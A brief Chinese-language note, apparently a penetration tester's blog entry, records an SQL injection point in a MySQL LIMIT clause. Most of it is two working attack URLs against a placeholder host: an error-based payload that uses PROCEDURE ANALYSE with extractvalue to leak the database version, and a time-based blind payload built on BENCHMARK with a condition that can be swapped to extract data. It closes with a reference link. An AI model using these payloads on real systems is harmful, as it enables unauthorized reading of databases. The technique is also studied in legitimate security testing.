今天遇到的,记录下,如下位置产生sql注入
select xxx from x order by xx limit {sql}
花括号位置为可控的点,支持报错的话可以利用如下语句获取内容
http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23
不支持报错语句如下:
http://test.com/test.php?id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(if(1=1,BENCHMARK(5000000,SHA1(1)),1))))),1)%23
其中可修改if后面(1=1位置处)的条件,根据是否延时判断执行结果
参考文章:http://netsecurity.51cto.com/art/201501/464519.htm